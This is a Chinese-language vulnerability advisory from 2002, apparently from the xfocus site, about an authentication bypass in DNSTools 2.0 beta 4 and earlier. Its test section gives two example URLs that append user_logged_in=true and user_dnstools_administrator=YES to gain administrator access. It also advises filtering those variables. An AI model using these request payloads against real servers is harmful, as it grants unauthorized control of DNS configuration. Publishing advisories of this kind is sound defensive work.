xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

dnstools存在验证可绕过漏洞


发布时间:2002-04-30
更新时间:2002-04-30
严重程度:
威胁程度:控制应用程序系统
错误类型:访问验证错误
利用方式:服务器模式

受影响系统
2.0 beta 4 及之前版本
详细描述
DNSTools是DNS配置商业解决方案,可以方便的构建大型DNS数据。软件使用两个变量保存用户验证状态(normal user / administration).不幸的是这些变量没有进行正确过,只要增加"user_logged_in=true" 和想要变为管理员权限的变量"user_dnstools_administrator=YES"并提交给任意你还没有登录URL,就可以导致绕过验证登陆。

测试代码
http://www.example.com/dnstools.php?section=hosts&user_logged_in=true
http://www.example.com/dnstools.php?section=security&user_logged_in=true
&user_dnstools_administrator=YES

解决方案
在dnstools.php脚本开始处过滤变量。

相关信息
ppp-design (security@ppp-design.de)
参考:http://archives.neohapsis.com/archives/bugtraq/2002-04/0390.html